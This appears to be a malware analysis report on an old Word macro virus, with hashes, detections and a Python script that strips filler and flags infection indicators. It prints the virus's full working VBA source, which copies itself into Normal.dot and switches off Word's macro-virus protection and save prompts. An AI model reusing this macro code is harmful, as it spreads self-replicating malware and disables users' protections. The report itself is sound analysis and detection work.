Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d1786e9c408faa46…

MALICIOUS

Office (OLE)

Size: 31.0 KB
Created: 2000-02-03 07:22:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14

MD5: 9f37c223488a1897a7e539be54c6f585
SHA-1: 11da4ecc7c4cf6128a6af5b557b4dc34b604ee64
SHA-256: d1786e9c408faa469f0be56098c7d8217cde1115cec030bef8cb7a65a9a2fdf0

Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Word 97-era document (authoring application Microsoft Word 8.0) whose ThisDocument module carries a Document_Open macro, so the code runs as soon as the file is opened with macros enabled. The macro is a self-replicating macro virus, not a downloader. It walks ThisDocument.VBProject to its own CodeModule and reads its complete source with .Lines(1, .CountOfLines), then picks a target project: NormalTemplate when the infected file is the active document, otherwise ActiveDocument. It wipes the first module of that project with .DeleteLines 1, .CountOfLines and writes the copied source into it with .AddFromString, which turns the user's Normal.dot into a carrier, so every document opened or created in Word afterwards runs the same code. It finishes by setting Options.ConfirmConversions, Options.SaveNormalPrompt and Options.VirusProtection to 0, so Word neither shows the macro-virus-protection warning nor prompts when the modified Normal template is saved. Roughly half of the statements are filler: repeated assignments such as A1 = System.Country, gh = Application.DisplayAlerts, Author = "Lys Kovick" and R = U = Confused whose results are never read, interleaved with the real statements to pad the module and defeat naive signatures; the ClamAV name Doc.Trojan.Confusion-2 reflects that padding. The module contains no URL, no Shell or CreateObject call and no file write, so there is no evidence of a downloaded second-stage payload, and the extracted source is complete (it ends at End Sub). The spearphishing-attachment mapping describes the usual delivery route for macro-bearing documents; the sample itself carries no evidence of how it was delivered.

Heuristics (3)

  • ClamAV: Doc.Trojan.Confusion-2 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Confusion-2
  • VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    The macro is bound to the Document_Open event and runs automatically when the file is opened with macros enabled

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2386 bytes
SHA-256: 90d4e78c0b6ac5f2f937edec1672a34a772c87fd4202a5ccbb01ec6b740ef826

Extracted script (the preview shows up to 1,000 lines; this module is 108 lines, so it appears in full):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
A1 = System.Country
Set A = ThisDocument
gh = Application.DisplayAlerts
With A
Set dfg = Word.System
Set B = .VBProject
If Application.Documents.Count = 0 Then gfs = Application.Caption
End With
Author = "Lys Kovick"
With B
Application.Visible = True
Set C = .VBComponents
If C1 = Application.Version Then Beep
End With
kgb = afterme
With C
CPU = System.ProcessorType
Set D = .Item(1)
R = U = Confused
End With
ICU = DoUCMe
With D
BSBSBS = Application.Caption
Set E = .CodeModule
OS = System.OperatingSystem
End With
TD = ThisDocument
With E
A1 = System.Country
F = .Lines(1, .CountOfLines)
gh = Application.DisplayAlerts
End With
Set dfg = Word.System
If A = ActiveDocument Then
If Application.Documents.Count = 0 Then gfs = Application.Caption
Set G = NormalTemplate
Author = "Lys Kovick"
Else
Application.Visible = True
Set G = ActiveDocument
If C1 = Application.Version Then Beep
End If
kgb = afterme
With G
CPU = System.ProcessorType
Set H = .VBProject
R = U = Confused
End With
ICU = DoUCMe
With H
BSBSBS = Application.Caption
Set I = .VBComponents
OS = System.OperatingSystem
End With
TD = ThisDocument
With I
A1 = System.Country
Set J = .Item(1)
gh = Application.DisplayAlerts
End With
Set dfg = Word.System
With J
If Application.Documents.Count = 0 Then gfs = Application.Caption
Set K = .CodeModule
Author = "Lys Kovick"
End With
Application.Visible = True
With K
If C1 = Application.Version Then Beep
.DeleteLines 1, .CountOfLines
kgb = afterme
End With
CPU = System.ProcessorType
With K
R = U = Confused
.AddFromString F
ICU = DoUCMe
End With
BSBSBS = Application.Caption
Set L = Options
OS = System.OperatingSystem
With L
TD = ThisDocument
.ConfirmConversions = 0
A1 = System.Country
End With
gh = Application.DisplayAlerts
With L
Set dfg = Word.System
.SaveNormalPrompt = 0
If Application.Documents.Count = 0 Then gfs = Application.Caption
End With
Author = "Lys Kovick"
With L
Application.Visible = True
.VirusProtection = 0
If C1 = Application.Version Then Beep
End With
kgb = afterme
End Sub
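The macro is far easier to read once the filler is gone. The script below is an added example for this report, not code from the analysis platform or from oletools: it takes decoded VBA source of the kind olevba writes to macros.bas, drops every assignment to a variable that no other statement reads (the `A1 = System.Country` style padding), and then checks what is left for the self-replication indicators described under Malware Insights. The embedded input is a constructed, shortened excerpt of the macro above (the chains of With blocks are collapsed into dotted expressions, the filler is kept so there is something to strip); the indicator names, the treatment of a bare `Beep` as filler, and all function and variable names are this example's own assumptions, not a platform taxonomy.

```python
"""Strip the filler from a padded VBA macro and flag the Normal-template
infection pattern. Added example for this report (not oletools or platform
code); input is decoded VBA source as olevba writes it to macros.bas."""
import re

# Constructed, shortened excerpt of the Document_Open macro shown above:
# the With-block chains are collapsed into dotted expressions, the filler
# statements are kept so the de-junking step has something to remove.
SAMPLE_VBA = """\
Private Sub Document_Open()
A1 = System.Country
Set A = ThisDocument
gh = Application.DisplayAlerts
With A
Set B = .VBProject
If Application.Documents.Count = 0 Then gfs = Application.Caption
End With
Set E = B.VBComponents.Item(1).CodeModule
F = E.Lines(1, E.CountOfLines)
R = U = Confused
If A = ActiveDocument Then
Set G = NormalTemplate
Else
Set G = ActiveDocument
End If
Set K = G.VBProject.VBComponents.Item(1).CodeModule
With K
If C1 = Application.Version Then Beep
.DeleteLines 1, .CountOfLines
.AddFromString F
End With
Set L = Options
OS = System.OperatingSystem
With L
.SaveNormalPrompt = 0
.VirusProtection = 0
End With
End Sub
"""

IDENT = re.compile(r"(?<![.\w])[A-Za-z_]\w*")  # leading name of a dotted chain only
ASSIGN = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*.+$", re.I)  # `x = ...`, never `.Prop = ...`
ONE_LINE_IF = re.compile(r"^If\s+(.+?)\s+Then\s+(.+)$", re.I)
NOISE_CALLS = {"beep"}  # assumption: a bare Beep behind a junk comparison is filler

# Assumed indicator set for this example (names are this example's own).
INDICATORS = {
    "reads_own_source": re.compile(r"\bLines\s*\(.*CountOfLines", re.I),
    "rewrites_module": re.compile(r"\.(DeleteLines|AddFromString|InsertLines|AddFromFile)\b", re.I),
    "targets_normal_template": re.compile(r"\bNormalTemplate\b", re.I),
    "disables_virus_protection": re.compile(r"\.VirusProtection\s*=\s*(0|False)\b", re.I),
    "silences_prompts": re.compile(r"\.(SaveNormalPrompt|ConfirmConversions)\s*=\s*(0|False)\b", re.I),
}

def _split_if(stmt):
    """Return (condition, body) for a single-line If, else (None, stmt)."""
    m = ONE_LINE_IF.match(stmt)
    return (m.group(1), m.group(2)) if m else (None, stmt)

def dejunk(src):
    """Return [(line_no, text)] minus write-only assignments and noise calls.

    An assignment to a plain variable that no other statement reads has no
    observable effect; property writes such as `.VirusProtection = 0` have no
    bare-identifier target and are never removed. VBA names are case-insensitive.
    """
    lines = [(i + 1, ln.strip()) for i, ln in enumerate(src.splitlines()) if ln.strip()]
    target = {}  # line_no -> variable assigned on that line
    reads = {}   # variable -> number of references on other statements
    for no, text in lines:
        _cond, body = _split_if(text)
        m = ASSIGN.match(body)
        lhs = m.group(1).lower() if m else None
        if lhs:
            target[no] = lhs
        for name in IDENT.findall(text):
            if name.lower() != lhs:
                reads[name.lower()] = reads.get(name.lower(), 0) + 1
    kept = []
    for no, text in lines:
        cond, body = _split_if(text)
        if no in target and reads.get(target[no], 0) == 0:
            continue  # write-only variable: filler
        if cond is not None and body.strip().lower() in NOISE_CALLS:
            continue  # `If <junk comparison> Then Beep`
        kept.append((no, text))
    return kept

def classify(src):
    """De-junk `src` and report which indicators the surviving lines hit."""
    kept = dejunk(src)
    hits = {name: [no for no, text in kept if rx.search(text)] for name, rx in INDICATORS.items()}
    core = ("reads_own_source", "rewrites_module", "targets_normal_template")
    verdict = ("self-replicating Normal-template infector" if all(hits[k] for k in core)
               else "no replication pattern")
    return {"kept": kept, "hits": hits, "verdict": verdict}

if __name__ == "__main__":
    for no, text in classify(SAMPLE_VBA)["kept"]:
        print(f"{no:3d}  {text}")
```

Run against the full macros.bas above, the verdict is the same: every Set target survives because the following With block reads it, the `F = .Lines(1, .CountOfLines)` line survives because `.AddFromString F` reads F, and `Application.Visible = True` plus the three Options writes are kept because a property assignment has no bare-identifier target. The de-junking is deliberately conservative: it only removes a statement whose effect it can see is nil, so an unfamiliar call stays in the output for a human to judge rather than being guessed away.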